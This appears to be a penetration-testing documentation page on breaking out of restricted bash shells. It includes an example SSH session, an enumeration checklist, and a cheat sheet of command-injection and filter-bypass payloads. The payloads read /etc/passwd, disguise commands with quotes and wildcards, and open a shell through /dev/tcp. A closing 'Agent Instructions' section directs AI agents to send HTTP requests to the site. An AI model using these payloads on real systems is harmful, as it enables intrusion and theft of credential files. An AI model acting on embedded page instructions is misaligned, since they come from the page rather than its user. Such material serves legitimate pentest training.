# Restricted shells

## Example for restricted shell

```
root@Desktop: ~ #ssh -6 user@fe80::XXXXX:2c74%wlan0 
user@fe80::XXXXX:2c74%wlan0 's password: 
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-34-generic x86_64) 
Documentation:  https://help.ubuntu.com 
Management:     https://landscape.canonical.com 
Support:        https://ubuntu.com/advantage 
Last login: Fri Jul 12 14:15:45 2019 from fe80::XXXXX:2c74%wlan0  
jail@HOST:~$ -rbash: /dev/null: restricted: cannot redirect output 
bash: _upvars: -a0': invalid number specifier  
-rbash: /dev/null: restricted: cannot redirect output  
bash: _upvars: -a0': invalid number specifier 
-rbash: /dev/null: restricted: cannot redirect output 
bash: _upvars: -a0': invalid number specifier  
-rbash: /dev/null: restricted: cannot redirect output  
bash: _upvars: -a0': invalid number specifier 
     
user@HOST:~$ vim 
-rbash: /usr/lib/command-not-found: restricted: cannot specify /' in command names  
jail@HOST:~$ exit 
logout  
-rbash: /usr/bin/clear_console: restricted: cannot specify /' in command names 
Connection to fe80::XXXXX:2c74%wlan0  closed. 
 
```

First: 

1. Check 'echo $PATH' 
2. Ls  to check what command in the $path (ls -l /home/student/.bin) 
3. Fix path  export PATH=/bin:/usr/bin 

**Enumeration Linux Environment Enumeration is the most important part**. We need to enumeration the Linux environmental to check what we can do to bypass the rbash. 

We need to enumerate :  

1. First we must to check for available commands like cd/ls/echo etc.  
2. We must to check for operators like >,>>,<,|. &#x20;
3. We need to check for available programming languages like perl,ruby,python etc. &#x20;
4. Which commands we can run as root (sudo -l). &#x20;
5. Check for files or commands with SUID perm. &#x20;
6. You must to check in what shell you are : echo $SHELL you will be in rbash by 90% &#x20;
7. Check for the Environmental Variables : run env or printenv Now let’s move into Common Exploitation Techniques.&#x20;

### Practice

Practice restricted shell escape: <https://www.root-me.org/en/Challenges/App-Script/Bash-Restricted-shells>

## SSH

`ssh user@192.168.0.53 -t bash`&#x20;

Or&#x20;

`ssh user@192.168.0.53 -t /bin/bash`&#x20;

Or

`ssh user@192.168.0.53 -t "bash --noprofile"`

## Add Path

`export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin`

## Chaining commands&#x20;

```
original_cmd_by_server; ls 
original_cmd_by_server && ls 
original_cmd_by_server | ls 
original_cmd_by_server || ls    Only if the first cmd fail 
```

## Inside a command&#x20;

```
original_cmd_by_server `cat /etc/passwd` 
original_cmd_by_server $(cat /etc/passwd)
```

## Filter Bypasses&#x20;

### Bypass without space&#x20;

Works on Linux only.&#x20;

`cat</etc/passwd`&#x20;

`{cat,/etc/passwd}`&#x20;

`cat$IFS/etc/passwd`&#x20;

`echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd`&#x20;

`X=$'uname\x20-a'&&$X`&#x20;

`sh</dev/tcp/127.0.0.1/4242`&#x20;

### Commands execution without spaces, $ or { } - Linux (Bash only)&#x20;

``IFS=,;`cat<<<uname,-a``

Works on Windows only.&#x20;

`ping%CommonProgramFiles:~10,-18%IP`&#x20;

`ping%PROGRAMFILES:~10,-5%IP`&#x20;

### Bypass with a line return&#x20;

`something%0Acat%20/etc/passwd`&#x20;

### Bypass Blacklisted words&#x20;

**Bypass with single quote**&#x20;

`w'h'o'am'i`&#x20;

**Bypass with double quote**&#x20;

`w"h"o"am"i`&#x20;

**Bypass with backslash and slash**&#x20;

`w\ho\am\i`&#x20;

`/\b\i\n/////s\h`&#x20;

**Bypass with $@**&#x20;

`who$@ami`&#x20;

echo $0&#x20;

-> /usr/bin/zsh&#x20;

echo whoami|$0&#x20;

**Bypass with variable expansion**&#x20;

`/???/??t /???/p??s??`&#x20;

test=/ehhh/hmtc/pahhh/hmsswd&#x20;

cat ${test//hhh\\/hm/}&#x20;

cat ${test//hh??hm/}&#x20;

**Bypass with wildcards**&#x20;

`powershell C:\*\*2\n??e*d.*? # notepad`&#x20;

`@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc`&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://infra.newerasec.com/infrastructure-testing/breakout/restricted-shells.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.